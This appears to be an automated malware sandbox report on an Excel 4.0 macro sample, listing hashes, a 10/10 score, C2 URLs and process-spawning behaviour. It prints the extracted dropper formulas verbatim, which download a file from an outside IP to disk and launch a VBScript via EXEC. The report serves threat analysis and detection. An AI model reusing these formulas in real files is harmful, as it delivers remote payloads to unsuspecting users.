General

  • Target

    23b60bc9f3011bbce0be570e648c6947

  • Size

    6KB

  • Sample

    231221-3b9ezscca5

  • MD5

    23b60bc9f3011bbce0be570e648c6947

  • SHA1

    4ca22d40c35557d945f9b76c998b63e451bcf3a4

  • SHA256

    b298bb3c10ec85aa080cc23184c1fc736d61179c6a4f614cc5a6b1a6b3647685

  • SHA512

    cebfc71e0558448e55d4daeff9e25af4d8c1fac915d3a73825f411430e73280b6ca41d6a1cb544a504596724d7f0e9ea8d5799965e486e12af63f5a180c9bdd9

  • SSDEEP

    192:NDSluSXbrA2OmmfR68UhHFBFYukb98yDb+m:NmuoM2ww1FYdb98yDl

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      23b60bc9f3011bbce0be570e648c6947

    • Size

      6KB

    • MD5

      23b60bc9f3011bbce0be570e648c6947

    • SHA1

      4ca22d40c35557d945f9b76c998b63e451bcf3a4

    • SHA256

      b298bb3c10ec85aa080cc23184c1fc736d61179c6a4f614cc5a6b1a6b3647685

    • SHA512

      cebfc71e0558448e55d4daeff9e25af4d8c1fac915d3a73825f411430e73280b6ca41d6a1cb544a504596724d7f0e9ea8d5799965e486e12af63f5a180c9bdd9

    • SSDEEP

      192:NDSluSXbrA2OmmfR68UhHFBFYukb98yDb+m:NmuoM2ww1FYdb98yDl

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks